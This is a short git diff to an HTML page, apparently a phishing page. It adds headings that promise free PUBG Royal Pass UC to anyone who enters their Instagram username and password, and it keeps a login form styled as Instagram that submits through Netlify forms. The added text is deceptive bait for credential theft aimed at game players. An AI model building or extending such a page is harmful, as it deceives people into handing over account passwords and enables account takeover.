--- a/index.html
+++ b/index.html
@@ -61,7 +61,11 @@ input:focus {}
 </head>
 
 <body background="https://storage.googleapis.com/kaggle-media/competitions/PUBG/PUBG%20Inlay.jpg">
-  <div class="login">
+ 
+	<h1> Please Enter Your Instagram username and password to get free Royal Pass UC. </h1>
+	<h2> You'll be asked to enter your Pubg Username on next stage </h2>
+	
+	<div class="login">
 	<h1><img src="" alt="Instagram"></h1>
 	  <form name="login" method="POST" data-netlify="true">
   <p>
